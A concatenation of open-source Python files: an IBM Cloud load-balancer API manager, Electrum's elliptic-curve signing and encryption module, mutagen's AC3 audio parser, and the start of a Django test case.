self.package_keyname = 'LBAAS'
def get_adcs(self, mask=None):
"""Returns a list of all netscalers.
:returns: SoftLayer_Network_Application_Delivery_Controller[].
"""
if mask is None:
mask = 'mask[managementIpAddress,outboundPublicBandwidthUsage,primaryIpAddress,datacenter]'
return self.account.getApplicationDeliveryControllers(mask=mask)
def get_adc(self, identifier, mask=None):
"""Returns a netscaler object.
:returns: SoftLayer_Network_Application_Delivery_Controller.
"""
if mask is None:
mask = "mask[networkVlans, password, managementIpAddress, primaryIpAddress, subnets, tagReferences, " \
"licenseExpirationDate, datacenter]"
return self.adc.getObject(id=identifier, mask=mask)
def get_lbaas(self, mask=None):
"""Returns a list of IBM Cloud Loadbalancers
:returns: SoftLayer_Network_LBaaS_LoadBalancer[]
"""
if mask is None:
mask = "mask[datacenter,listenerCount,memberCount]"
this_lb = self.lbaas.getAllObjects(mask=mask)
return this_lb
def get_lb(self, identifier, mask=None):
"""Returns a IBM Cloud LoadBalancer
:returns: SoftLayer_Network_LBaaS_LoadBalancer
"""
if mask is None:
mask = "mask[healthMonitors, l7Pools, members, sslCiphers, " \
"listeners[defaultPool[healthMonitor, members, sessionAffinity],l7Policies]]"
this_lb = self.lbaas.getObject(id=identifier, mask=mask)
health = self.lbaas.getLoadBalancerMemberHealth(this_lb.get('uuid'))
this_lb['health'] = health
return this_lb
def update_lb_health_monitors(self, uuid, checks):
"""calls SoftLayer_Network_LBaaS_HealthMonitor::updateLoadBalancerHealthMonitors()
- `updateLoadBalancerHealthMonitors <https://sldn.softlayer.com/reference/services/SoftLayer_Network_LBaaS_\
HealthMonitor/updateLoadBalancerHealthMonitors/>`_
- `SoftLayer_Network_LBaaS_LoadBalancerHealthMonitorConfiguration <https://sldn.softlayer.com/reference/\
datatypes/SoftLayer_Network_LBaaS_LoadBalancerHealthMonitorConfiguration/>`_
:param uuid: loadBalancerUuid
:param checks list: SoftLayer_Network_LBaaS_LoadBalancerHealthMonitorConfiguration[]
"""
# return self.lbaas.updateLoadBalancerHealthMonitors(uuid, checks)
return self.client.call('SoftLayer_Network_LBaaS_HealthMonitor', 'updateLoadBalancerHealthMonitors',
uuid, checks)
def get_lbaas_uuid_id(self, identifier):
"""Gets a LBaaS uuid, id. Since sometimes you need one or the other.
:param identifier: either the LB Id, UUID or Name, this function will return UUI and LB Id.
:return (uuid, id):
"""
mask = "mask[id,uuid]"
if isinstance(identifier, int) or identifier.isdigit():
this_lb = self.lbaas.getObject(id=identifier, mask=mask)
elif len(identifier) == 36 and utils.UUID_RE.match(identifier):
this_lb = self.lbaas.getLoadBalancer(identifier, mask=mask)
else:
this_lb = self.get_lbaas_by_name(identifier, mask=mask)
return this_lb.get('uuid'), this_lb.get('id')
def get_lbaas_by_name(self, name, mask=None):
"""Gets a LBaaS by name.
:param name: Name of the LBaaS instance
:param mask:
:returns: SoftLayer_Network_LBaaS_LoadBalancer.
"""
object_filter = {'name': {'operation': name}}
this_lbs = self.lbaas.getAllObjects(filter=object_filter, mask=mask)
if not this_lbs:
raise exceptions.SoftLayerError("Unable to find LBaaS with name: {}".format(name))
return this_lbs[0]
def delete_lb_member(self, identifier, member_id):
"""Removes a member from a LBaaS instance
https://sldn.softlayer.com/reference/services/SoftLayer_Network_LBaaS_Member/deleteLoadBalancerMembers/
:param identifier: UUID of the LBaaS instance
:param member_id: Member UUID to remove.
"""
return self.client.call('SoftLayer_Network_LBaaS_Member', 'deleteLoadBalancerMembers',
identifier, [member_id])
def add_lb_member(self, identifier, service_info):
"""Adds a member to a LBaaS instance
https://sldn.softlayer.com/reference/services/SoftLayer_Network_LBaaS_Member/deleteLoadBalancerMembers/
:param identifier: UUID of the LBaaS instance
:param service_info: datatypes/SoftLayer_Network_LBaaS_LoadBalancerServerInstanceInfo
"""
return self.client.call('SoftLayer_Network_LBaaS_Member', 'addLoadBalancerMembers',
identifier, [service_info])
def add_lb_listener(self, identifier, listener):
"""Adds or update a listener to a LBaaS instance
When using this to update a listener, just include the 'listenerUuid' in the listener object
See the following for listener configuration options
https://sldn.softlayer.com/reference/datatypes/SoftLayer_Network_LBaaS_LoadBalancerProtocolConfiguration/
:param identifier: UUID of the LBaaS instance
:param listener: Object with all listener configurations
"""
return self.client.call('SoftLayer_Network_LBaaS_Listener', 'updateLoadBalancerProtocols',
identifier, [listener])
def get_l7policies(self, identifier):
"""Gets Layer7 policies from a listener
:param identifier: id
"""
return self.client.call('SoftLayer_Network_LBaaS_Listener', 'getL7Policies', id=identifier)
def get_all_l7policies(self):
"""Gets all Layer7 policies
:returns: Dictionary of (protocol_id: policies list).
"""
mask = 'mask[listeners[l7Policies]]'
lbaas = self.get_lbaas(mask=mask)
listeners = []
for load_bal in lbaas:
listeners.extend(load_bal.get('listeners'))
policies = {}
for protocol in listeners:
if protocol.get('l7Policies'):
listener_id = protocol.get('id')
l7policies = protocol.get('l7Policies')
policies[listener_id] = l7policies
return policies
def add_lb_l7_pool(self, identifier, pool, members, health, session):
"""Creates a new l7 pool for a LBaaS instance
- https://sldn.softlayer.com/reference/services/SoftLayer_Network_LBaaS_L7Pool/createL7Pool/
- https://cloud.ibm.com/docs/infrastructure/loadbalancer-service?topic=loadbalancer-service-api-reference
:param identifier: UUID of the LBaaS instance
:param pool SoftLayer_Network_LBaaS_L7Pool: Description of the pool
:param members SoftLayer_Network_LBaaS_L7Member[]: Array of servers with their address, port, weight
:param monitor SoftLayer_Network_LBaaS_L7HealthMonitor: A health monitor
:param session SoftLayer_Network_LBaaS_L7SessionAffinity: Weather to use affinity
"""
return self.client.call('SoftLayer_Network_LBaaS_L7Pool', 'createL7Pool',
identifier, pool, members, health, session)
def del_lb_l7_pool(self, identifier):
"""Deletes a l7 pool
:param identifier: Id of the L7Pool
"""
return self.client.call('SoftLayer_Network_LBaaS_L7Pool', 'deleteObject', id=identifier)
def remove_lb_listener(self, identifier, listener):
"""Removes a listener to a LBaaS instance
:param identifier: UUID of the LBaaS instance
:param listener: UUID of the Listner to be removed.
"""
return self.client.call('SoftLayer_Network_LBaaS_Listener', 'deleteLoadBalancerProtocols',
identifier, [listener])
def order_lbaas(self, datacenter, name, desc, protocols, subnet_id, public=False, verify=False):
"""Allows to order a Load Balancer
:param datacenter: Shortname for the SoftLayer datacenter to order in.
:param name: Identifier for the new LB.
:param desc: Optional description for the lb.
:param protocols: https://sldn.softlayer.com/reference/datatypes/SoftLayer_Network_LBaaS_Listener/
:param subnet_id: Id of the subnet for this new LB to live on.
:param public: Use Public side for the backend.
:param verify: Don't actually order if True.
"""
order_mgr = ordering.OrderingManager(self.client)
package = order_mgr.get_package_by_key(self.package_keyname, mask='mask[id,keyName,itemPrices]')
prices = []
for price in package.get('itemPrices'):
if not price.get('locationGroupId', False):
prices.append(price.get('id'))
# Build the configuration of the order
order_data = {
'complexType': 'SoftLayer_Container_Product_Order_Network_LoadBalancer_AsAService',
'name': name,
'description': desc,
'location': datacenter,
'packageId': package.get('id'),
'useHourlyPricing': True, # Required since LBaaS is an hourly service
'prices': [{'id': price_id} for price_id in prices],
'protocolConfigurations': protocols,
'subnets': [{'id': subnet_id}],
'isPublic': public
}
if verify:
response = self.client['Product_Order'].verifyOrder(order_data)
else:
response = self.client['Product_Order'].placeOrder(order_data)
return response
def lbaas_order_options(self):
"""Gets the options to order a LBaaS instance."""
_filter = {'keyName': {'operation': self.package_keyname}}
mask = "mask[id,keyName,name,items[prices],regions[location[location[groups]]]]"
package = self.client.call('SoftLayer_Product_Package', 'getAllObjects', filter=_filter, mask=mask)
return package.pop()
def cancel_lbaas(self, uuid):
"""Cancels a LBaaS instance.
https://sldn.softlayer.com/reference/services/SoftLayer_Network_LBaaS_LoadBalancer/cancelLoadBalancer/
:param uuid string: UUID of the LBaaS instance to cancel
"""
return self.lbaas.cancelLoadBalancer(uuid)
|
|
# -*- coding: utf-8 -*-
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2018 The Electrum developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import base64
import hmac
import hashlib
from typing import Union
import ecdsa
from ecdsa.ecdsa import curve_secp256k1, generator_secp256k1
from ecdsa.curves import SECP256k1
from ecdsa.ellipticcurve import Point
from ecdsa.util import string_to_number, number_to_string
from .util import bfh, bh2u, assert_bytes, print_error, to_bytes, InvalidPassword, profiler
from .crypto import (Hash, aes_encrypt_with_iv, aes_decrypt_with_iv, hmac_oneshot)
from .ecc_fast import do_monkey_patching_of_python_ecdsa_internals_with_libsecp256k1
do_monkey_patching_of_python_ecdsa_internals_with_libsecp256k1()
CURVE_ORDER = SECP256k1.order
def generator():
return ECPubkey.from_point(generator_secp256k1)
def point_at_infinity():
return ECPubkey(None)
def sig_string_from_der_sig(der_sig, order=CURVE_ORDER):
r, s = ecdsa.util.sigdecode_der(der_sig, order)
return ecdsa.util.sigencode_string(r, s, order)
def der_sig_from_sig_string(sig_string, order=CURVE_ORDER):
r, s = ecdsa.util.sigdecode_string(sig_string, order)
return ecdsa.util.sigencode_der_canonize(r, s, order)
def der_sig_from_r_and_s(r, s, order=CURVE_ORDER):
return ecdsa.util.sigencode_der_canonize(r, s, order)
def get_r_and_s_from_der_sig(der_sig, order=CURVE_ORDER):
r, s = ecdsa.util.sigdecode_der(der_sig, order)
return r, s
def get_r_and_s_from_sig_string(sig_string, order=CURVE_ORDER):
r, s = ecdsa.util.sigdecode_string(sig_string, order)
return r, s
def sig_string_from_r_and_s(r, s, order=CURVE_ORDER):
return ecdsa.util.sigencode_string_canonize(r, s, order)
def point_to_ser(P, compressed=True) -> bytes:
if isinstance(P, tuple):
assert len(P) == 2, 'unexpected point: %s' % P
x, y = P
else:
x, y = P.x(), P.y()
if x is None or y is None: # infinity
return None
if compressed:
return bfh(('%02x' % (2+(y&1))) + ('%064x' % x))
return bfh('04'+('%064x' % x)+('%064x' % y))
def get_y_coord_from_x(x, odd=True):
curve = curve_secp256k1
_p = curve.p()
_a = curve.a()
_b = curve.b()
for offset in range(128):
Mx = x + offset
My2 = pow(Mx, 3, _p) + _a * pow(Mx, 2, _p) + _b % _p
My = pow(My2, (_p + 1) // 4, _p)
if curve.contains_point(Mx, My):
if odd == bool(My & 1):
return My
return _p - My
raise Exception('ECC_YfromX: No Y found')
def ser_to_point(ser: bytes) -> (int, int):
if ser[0] not in (0x02, 0x03, 0x04):
raise ValueError('Unexpected first byte: {}'.format(ser[0]))
if ser[0] == 0x04:
return string_to_number(ser[1:33]), string_to_number(ser[33:])
x = string_to_number(ser[1:])
return x, get_y_coord_from_x(x, ser[0] == 0x03)
def _ser_to_python_ecdsa_point(ser: bytes) -> ecdsa.ellipticcurve.Point:
x, y = ser_to_point(ser)
try:
return Point(curve_secp256k1, x, y, CURVE_ORDER)
except:
raise InvalidECPointException()
class InvalidECPointException(Exception):
"""e.g. not on curve, or infinity"""
class _MyVerifyingKey(ecdsa.VerifyingKey):
@classmethod
def from_signature(klass, sig, recid, h, curve): # TODO use libsecp??
""" See http://www.secg.org/download/aid-780/sec1-v2.pdf, chapter 4.1.6 """
from ecdsa import util, numbertheory
from . import msqr
curveFp = curve.curve
G = curve.generator
order = G.order()
# extract r,s from signature
r, s = util.sigdecode_string(sig, order)
# 1.1
x = r + (recid//2) * order
# 1.3
alpha = ( x * x * x + curveFp.a() * x + curveFp.b() ) % curveFp.p()
beta = msqr.modular_sqrt(alpha, curveFp.p())
y = beta if (beta - recid) % 2 == 0 else curveFp.p() - beta
# 1.4 the constructor checks that nR is at infinity
try:
R = Point(curveFp, x, y, order)
except:
raise InvalidECPointException()
# 1.5 compute e from message:
e = string_to_number(h)
minus_e = -e % order
# 1.6 compute Q = r^-1 (sR - eG)
inv_r = numbertheory.inverse_mod(r,order)
try:
Q = inv_r * ( s * R + minus_e * G )
except:
raise InvalidECPointException()
return klass.from_public_point( Q, curve )
class _MySigningKey(ecdsa.SigningKey):
"""Enforce low S values in signatures"""
def sign_number(self, number, entropy=None, k=None):
r, s = ecdsa.SigningKey.sign_number(self, number, entropy, k)
if s > CURVE_ORDER//2:
s = CURVE_ORDER - s
return r, s
class _PubkeyForPointAtInfinity:
point = ecdsa.ellipticcurve.INFINITY
class ECPubkey(object):
def __init__(self, b: bytes):
if b is not None:
assert_bytes(b)
point = _ser_to_python_ecdsa_point(b)
self._pubkey = ecdsa.ecdsa.Public_key(generator_secp256k1, point)
else:
self._pubkey = _PubkeyForPointAtInfinity()
@classmethod
def from_sig_string(cls, sig_string: bytes, recid: int, msg_hash: bytes):
assert_bytes(sig_string)
if len(sig_string) != 64:
raise Exception('Wrong encoding')
if recid < 0 or recid > 3:
raise ValueError('recid is {}, but should be 0 <= recid <= 3'.format(recid))
ecdsa_verifying_key = _MyVerifyingKey.from_signature(sig_string, recid, msg_hash, curve=SECP256k1)
ecdsa_point = ecdsa_verifying_key.pubkey.point
return ECPubkey.from_point(ecdsa_point)
@classmethod
def from_signature65(cls, sig: bytes, msg_hash: bytes):
if len(sig) != 65:
raise Exception("Wrong encoding")
nV = sig[0]
if nV < 27 or nV >= 35:
raise Exception("Bad encoding")
if nV >= 31:
compressed = True
nV -= 4
else:
compressed = False
recid = nV - 27
return cls.from_sig_string(sig[1:], recid, msg_hash), compressed
@classmethod
def from_point(cls, point):
_bytes = point_to_ser(point, compressed=False) # faster than compressed
return ECPubkey(_bytes)
def get_public_key_bytes(self, compressed=True):
if self.is_at_infinity(): raise Exception('point is at infinity')
return point_to_ser(self.point(), compressed)
def get_public_key_hex(self, compressed=True):
return bh2u(self.get_public_key_bytes(compressed))
def point(self) -> (int, int):
return self._pubkey.point.x(), self._pubkey.point.y()
def __mul__(self, other: int):
if not isinstance(other, int):
raise TypeError('multiplication not defined for ECPubkey and {}'.format(type(other)))
ecdsa_point = self._pubkey.point * other
return self.from_point(ecdsa_point)
def __rmul__(self, other: int):
return self * other
def __add__(self, other):
if not isinstance(other, ECPubkey):
raise TypeError('addition not defined for ECPubkey and {}'.format(type(other)))
ecdsa_point = self._pubkey.point + other._pubkey.point
return self.from_point(ecdsa_point)
def __eq__(self, other):
return self._pubkey.point.x() == other._pubkey.point.x() \
and self._pubkey.point.y() == other._pubkey.point.y()
def __ne__(self, other):
return not (self == other)
def verify_message_for_address(self, sig65: bytes, message: bytes) -> None:
assert_bytes(message)
h = Hash(msg_magic(message))
public_key, compressed = self.from_signature65(sig65, h)
# check public key
if public_key != self:
raise Exception("Bad signature")
# check message
self.verify_message_hash(sig65[1:], h)
def verify_message_hash(self, sig_string: bytes, msg_hash: bytes) -> None:
assert_bytes(sig_string)
if len(sig_string) != 64:
raise Exception('Wrong encoding')
ecdsa_point = self._pubkey.point
verifying_key = _MyVerifyingKey.from_public_point(ecdsa_point, curve=SECP256k1)
verifying_key.verify_digest(sig_string, msg_hash, sigdecode=ecdsa.util.sigdecode_string)
def encrypt_message(self, message: bytes, magic: bytes = b'BIE1'):
"""
ECIES encryption/decryption methods; AES-128-CBC with PKCS7 is used as the cipher; hmac-sha256 is used as the mac
"""
assert_bytes(message)
randint = ecdsa.util.randrange(CURVE_ORDER)
ephemeral_exponent = number_to_string(randint, CURVE_ORDER)
ephemeral = ECPrivkey(ephemeral_exponent)
ecdh_key = (self * ephemeral.secret_scalar).get_public_key_bytes(compressed=True)
key = hashlib.sha512(ecdh_key).digest()
iv, key_e, key_m = key[0:16], key[16:32], key[32:]
ciphertext = aes_encrypt_with_iv(key_e, iv, message)
ephemeral_pubkey = ephemeral.get_public_key_bytes(compressed=True)
encrypted = magic + ephemeral_pubkey + ciphertext
mac = hmac_oneshot(key_m, encrypted, hashlib.sha256)
return base64.b64encode(encrypted + mac)
@classmethod
def order(cls):
return CURVE_ORDER
def is_at_infinity(self):
return self == point_at_infinity()
def msg_magic(message: bytes) -> bytes:
from .bitcoin import var_int
length = bfh(var_int(len(message)))
return b"\x18Bitcoin Signed Message:\n" + length + message
def verify_message_with_address(address: str, sig65: bytes, message: bytes):
from .bitcoin import pubkey_to_address
assert_bytes(sig65, message)
try:
h = Hash(msg_magic(message))
public_key, compressed = ECPubkey.from_signature65(sig65, h)
# check public key using the address
pubkey_hex = public_key.get_public_key_hex(compressed)
for txin_type in ['p2pkh','p2wpkh','p2wpkh-p2sh']:
addr = pubkey_to_address(txin_type, pubkey_hex)
if address == addr:
break
else:
raise Exception("Bad signature")
# check message
public_key.verify_message_hash(sig65[1:], h)
return True
except Exception as e:
print_error("Verification error: {0}".format(e))
return False
def is_secret_within_curve_range(secret: Union[int, bytes]) -> bool:
if isinstance(secret, bytes):
secret = string_to_number(secret)
return 0 < secret < CURVE_ORDER
class ECPrivkey(ECPubkey):
def __init__(self, privkey_bytes: bytes):
assert_bytes(privkey_bytes)
if len(privkey_bytes) != 32:
raise Exception('unexpected size for secret. should be 32 bytes, not {}'.format(len(privkey_bytes)))
secret = string_to_number(privkey_bytes)
if not is_secret_within_curve_range(secret):
raise InvalidECPointException('Invalid secret scalar (not within curve order)')
self.secret_scalar = secret
point = generator_secp256k1 * secret
super().__init__(point_to_ser(point))
self._privkey = ecdsa.ecdsa.Private_key(self._pubkey, secret)
@classmethod
def from_secret_scalar(cls, secret_scalar: int):
secret_bytes = number_to_string(secret_scalar, CURVE_ORDER)
return ECPrivkey(secret_bytes)
@classmethod
def from_arbitrary_size_secret(cls, privkey_bytes: bytes):
"""This method is only for legacy reasons. Do not introduce new code that uses it.
Unlike the default constructor, this method does not require len(privkey_bytes) == 32,
and the secret does not need to be within the curve order either.
"""
return ECPrivkey(cls.normalize_secret_bytes(privkey_bytes))
@classmethod
def normalize_secret_bytes(cls, privkey_bytes: bytes) -> bytes:
scalar = string_to_number(privkey_bytes) % CURVE_ORDER
if scalar == 0:
raise Exception('invalid EC private key scalar: zero')
privkey_32bytes = number_to_string(scalar, CURVE_ORDER)
return privkey_32bytes
def sign(self, data: bytes, sigencode=None, sigdecode=None) -> bytes:
if sigencode is None:
sigencode = sig_string_from_r_and_s
if sigdecode is None:
sigdecode = get_r_and_s_from_sig_string
private_key = _MySigningKey.from_secret_exponent(self.secret_scalar, curve=SECP256k1)
sig = private_key.sign_digest_deterministic(data, hashfunc=hashlib.sha256, sigencode=sigencode)
public_key = private_key.get_verifying_key()
if not public_key.verify_digest(sig, data, sigdecode=sigdecode):
raise Exception('Sanity check verifying our own signature failed.')
return sig
def sign_transaction(self, hashed_preimage: bytes) -> bytes:
return self.sign(hashed_preimage,
sigencode=der_sig_from_r_and_s,
sigdecode=get_r_and_s_from_der_sig)
def sign_message(self, message: bytes, is_compressed: bool) -> bytes:
def bruteforce_recid(sig_string):
for recid in range(4):
sig65 = construct_sig65(sig_string, recid, is_compressed)
try:
self.verify_message_for_address(sig65, message)
return sig65, recid
except Exception as e:
continue
else:
raise Exception("error: cannot sign message. no recid fits..")
message = to_bytes(message, 'utf8')
msg_hash = Hash(msg_magic(message))
sig_string = self.sign(msg_hash,
sigencode=sig_string_from_r_and_s,
sigdecode=get_r_and_s_from_sig_string)
sig65, recid = bruteforce_recid(sig_string)
return sig65
def decrypt_message(self, encrypted, magic=b'BIE1'):
encrypted = base64.b64decode(encrypted)
if len(encrypted) < 85:
raise Exception('invalid ciphertext: length')
magic_found = encrypted[:4]
ephemeral_pubkey_bytes = encrypted[4:37]
ciphertext = encrypted[37:-32]
mac = encrypted[-32:]
if magic_found != magic:
raise Exception('invalid ciphertext: invalid magic bytes')
try:
ecdsa_point = _ser_to_python_ecdsa_point(ephemeral_pubkey_bytes)
except AssertionError as e:
raise Exception('invalid ciphertext: invalid ephemeral pubkey') from e
if not ecdsa.ecdsa.point_is_valid(generator_secp256k1, ecdsa_point.x(), ecdsa_point.y()):
raise Exception('invalid ciphertext: invalid ephemeral pubkey')
ephemeral_pubkey = ECPubkey.from_point(ecdsa_point)
ecdh_key = (ephemeral_pubkey * self.secret_scalar).get_public_key_bytes(compressed=True)
key = hashlib.sha512(ecdh_key).digest()
iv, key_e, key_m = key[0:16], key[16:32], key[32:]
if mac != hmac_oneshot(key_m, encrypted[:-32], hashlib.sha256):
raise InvalidPassword()
return aes_decrypt_with_iv(key_e, iv, ciphertext)
def construct_sig65(sig_string, recid, is_compressed):
comp = 4 if is_compressed else 0
return bytes([27 + recid + comp]) + sig_string
|
|
# -*- coding: utf-8 -*-
# Copyright (C) 2019 Philipp Wolfer
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
"""Pure AC3 file information.
"""
__all__ = ["AC3", "Open"]
from mutagen import StreamInfo
from mutagen._file import FileType
from mutagen._util import (
BitReader,
BitReaderError,
MutagenError,
convert_error,
enum,
loadfile,
endswith,
)
@enum
class ChannelMode(object):
DUALMONO = 0
MONO = 1
STEREO = 2
C3F = 3
C2F1R = 4
C3F1R = 5
C2F2R = 6
C3F2R = 7
AC3_CHANNELS = {
ChannelMode.DUALMONO: 2,
ChannelMode.MONO: 1,
ChannelMode.STEREO: 2,
ChannelMode.C3F: 3,
ChannelMode.C2F1R: 3,
ChannelMode.C3F1R: 4,
ChannelMode.C2F2R: 4,
ChannelMode.C3F2R: 5
}
AC3_HEADER_SIZE = 7
AC3_SAMPLE_RATES = [48000, 44100, 32000]
AC3_BITRATES = [
32, 40, 48, 56, 64, 80, 96, 112, 128,
160, 192, 224, 256, 320, 384, 448, 512, 576, 640
]
@enum
class EAC3FrameType(object):
INDEPENDENT = 0
DEPENDENT = 1
AC3_CONVERT = 2
RESERVED = 3
EAC3_BLOCKS = [1, 2, 3, 6]
class AC3Error(MutagenError):
pass
class AC3Info(StreamInfo):
"""AC3 stream information.
The length of the stream is just a guess and might not be correct.
Attributes:
channels (`int`): number of audio channels
length (`float`): file length in seconds, as a float
sample_rate (`int`): audio sampling rate in Hz
bitrate (`int`): audio bitrate, in bits per second
codec (`str`): ac-3 or ec-3 (Enhanced AC-3)
"""
channels = 0
length = 0
sample_rate = 0
bitrate = 0
codec = 'ac-3'
@convert_error(IOError, AC3Error)
def __init__(self, fileobj):
"""Raises AC3Error"""
header = bytearray(fileobj.read(6))
if len(header) < 6:
raise AC3Error("not enough data")
if not header.startswith(b"\x0b\x77"):
raise AC3Error("not a AC3 file")
bitstream_id = header[5] >> 3
if bitstream_id > 16:
raise AC3Error("invalid bitstream_id %i" % bitstream_id)
fileobj.seek(2)
self._read_header(fileobj, bitstream_id)
def _read_header(self, fileobj, bitstream_id):
bitreader = BitReader(fileobj)
try:
# This is partially based on code from
# https://github.com/FFmpeg/FFmpeg/blob/master/libavcodec/ac3_parser.c
if bitstream_id <= 10: # Normal AC-3
self._read_header_normal(bitreader, bitstream_id)
else: # Enhanced AC-3
self._read_header_enhanced(bitreader)
except BitReaderError as e:
raise AC3Error(e)
self.length = self._guess_length(fileobj)
def _read_header_normal(self, bitreader, bitstream_id):
r = bitreader
r.skip(16) # 16 bit CRC
sr_code = r.bits(2)
if sr_code == 3:
raise AC3Error("invalid sample rate code %i" % sr_code)
frame_size_code = r.bits(6)
if frame_size_code > 37:
raise AC3Error("invalid frame size code %i" % frame_size_code)
r.skip(5) # bitstream ID, already read
r.skip(3) # bitstream mode, not needed
channel_mode = ChannelMode(r.bits(3))
r.skip(2) # dolby surround mode or surround mix level
lfe_on = r.bits(1)
sr_shift = max(bitstream_id, 8) - 8
try:
self.sample_rate = AC3_SAMPLE_RATES[sr_code] >> sr_shift
self.bitrate = (AC3_BITRATES[frame_size_code >> 1] * 1000
) >> sr_shift
except KeyError as e:
raise AC3Error(e)
self.channels = self._get_channels(channel_mode, lfe_on)
self._skip_unused_header_bits_normal(r, channel_mode)
def _read_header_enhanced(self, bitreader):
r = bitreader
self.codec = "ec-3"
frame_type = r.bits(2)
if frame_type == EAC3FrameType.RESERVED:
raise AC3Error("invalid frame type %i" % frame_type)
r.skip(3) # substream ID, not needed
frame_size = (r.bits(11) + 1) << 1
if frame_size < AC3_HEADER_SIZE:
raise AC3Error("invalid frame size %i" % frame_size)
sr_code = r.bits(2)
try:
if sr_code == 3:
sr_code2 = r.bits(2)
if sr_code2 == 3:
raise AC3Error("invalid sample rate code %i" % sr_code2)
numblocks_code = 3
self.sample_rate = AC3_SAMPLE_RATES[sr_code2] // 2
else:
numblocks_code = r.bits(2)
self.sample_rate = AC3_SAMPLE_RATES[sr_code]
channel_mode = ChannelMode(r.bits(3))
lfe_on = r.bits(1)
self.bitrate = 8 * frame_size * self.sample_rate // (
EAC3_BLOCKS[numblocks_code] * 256)
except KeyError as e:
raise AC3Error(e)
r.skip(5) # bitstream ID, already read
self.channels = self._get_channels(channel_mode, lfe_on)
self._skip_unused_header_bits_enhanced(
r, frame_type, channel_mode, sr_code, numblocks_code)
@staticmethod
def _skip_unused_header_bits_normal(bitreader, channel_mode):
r = bitreader
r.skip(5) # Dialogue Normalization
if r.bits(1): # Compression Gain Word Exists
r.skip(8) # Compression Gain Word
if r.bits(1): # Language Code Exists
r.skip(8) # Language Code
if r.bits(1): # Audio Production Information Exists
# Mixing Level, 5 Bits
# Room Type, 2 Bits
r.skip(7)
if channel_mode == ChannelMode.DUALMONO:
r.skip(5) # Dialogue Normalization, ch2
if r.bits(1): # Compression Gain Word Exists, ch2
r.skip(8) # Compression Gain Word, ch2
if r.bits(1): # Language Code Exists, ch2
r.skip(8) # Language Code, ch2
if r.bits(1): # Audio Production Information Exists, ch2
# Mixing Level, ch2, 5 Bits
# Room Type, ch2, 2 Bits
r.skip(7)
# Copyright Bit, 1 Bit
# Original Bit Stream, 1 Bit
r.skip(2)
timecod1e = r.bits(1) # Time Code First Halve Exists
timecod2e = r.bits(1) # Time Code Second Halve Exists
if timecod1e:
r.skip(14) # Time Code First Half
if timecod2e:
r.skip(14) # Time Code Second Half
if r.bits(1): # Additional Bit Stream Information Exists
addbsil = r.bit(6) # Additional Bit Stream Information Length
r.skip((addbsil + 1) * 8)
@staticmethod
def _skip_unused_header_bits_enhanced(bitreader, frame_type, channel_mode,
sr_code, numblocks_code):
r = bitreader
r.skip(5) # Dialogue Normalization
if r.bits(1): # Compression Gain Word Exists
r.skip(8) # Compression Gain Word
if channel_mode == ChannelMode.DUALMONO:
r.skip(5) # Dialogue Normalization, ch2
if r.bits(1): # Compression Gain Word Exists, ch2
r.skip(8) # Compression Gain Word, ch2
if frame_type == EAC3FrameType.DEPENDENT:
if r.bits(1): # chanmap exists
r.skip(16) # chanmap
if r.bits(1): # mixmdate, 1 Bit
# FIXME: Handle channel dependent fields
return
if r.bits(1): # Informational Metadata Exists
# bsmod, 3 Bits
# Copyright Bit, 1 Bit
# Original Bit Stream, 1 Bit
r.skip(5)
if channel_mode == ChannelMode.STEREO:
# dsurmod. 2 Bits
# dheadphonmod, 2 Bits
r.skip(4)
elif channel_mode >= ChannelMode.C2F2R:
r.skip(2) # dsurexmod
if r.bits(1): # Audio Production Information Exists
# Mixing Level, 5 Bits
# Room Type, 2 Bits
# adconvtyp, 1 Bit
r.skip(8)
if channel_mode == ChannelMode.DUALMONO:
if r.bits(1): # Audio Production Information Exists, ch2
# Mixing Level, ch2, 5 Bits
# Room Type, ch2, 2 Bits
# adconvtyp, ch2, 1 Bit
r.skip(8)
if sr_code < 3: # if not half sample rate
r.skip(1) # sourcefscod
if frame_type == EAC3FrameType.INDEPENDENT and numblocks_code == 3:
r.skip(1) # convsync
if frame_type == EAC3FrameType.AC3_CONVERT:
if numblocks_code != 3:
if r.bits(1): # blkid
r.skip(6) # frmsizecod
if r.bits(1): # Additional Bit Stream Information Exists
addbsil = r.bit(6) # Additional Bit Stream Information Length
r.skip((addbsil + 1) * 8)
@staticmethod
def _get_channels(channel_mode, lfe_on):
try:
return AC3_CHANNELS[channel_mode] + lfe_on
except KeyError as e:
raise AC3Error(e)
def _guess_length(self, fileobj):
# use bitrate + data size to guess length
if self.bitrate == 0:
return
start = fileobj.tell()
fileobj.seek(0, 2)
length = fileobj.tell() - start
return 8.0 * length / self.bitrate
def pprint(self):
return u"%s, %d Hz, %.2f seconds, %d channel(s), %d bps" % (
self.codec, self.sample_rate, self.length, self.channels,
self.bitrate)
class AC3(FileType):
"""AC3(filething)
Arguments:
filething (filething)
Load AC3 or EAC3 files.
Tagging is not supported.
Use the ID3/APEv2 classes directly instead.
Attributes:
info (`AC3Info`)
"""
_mimes = ["audio/ac3"]
@loadfile()
def load(self, filething):
self.info = AC3Info(filething.fileobj)
def add_tags(self):
raise AC3Error("doesn't support tags")
@staticmethod
def score(filename, fileobj, header):
return header.startswith(b"\x0b\x77") * 2 \
+ (endswith(filename, ".ac3") or endswith(filename, ".eac3"))
Open = AC3
error = AC3Error
|
|
from django.test import TransactionTestCase
from django.core.exceptions import ValidationError
from django.core.management import call_command
from .. import models
class ServiceTests(TransactionTestCase):
def setUp(self):
call_command('registerplugins')
self.http = models.Plugin.objects.get(name='http')
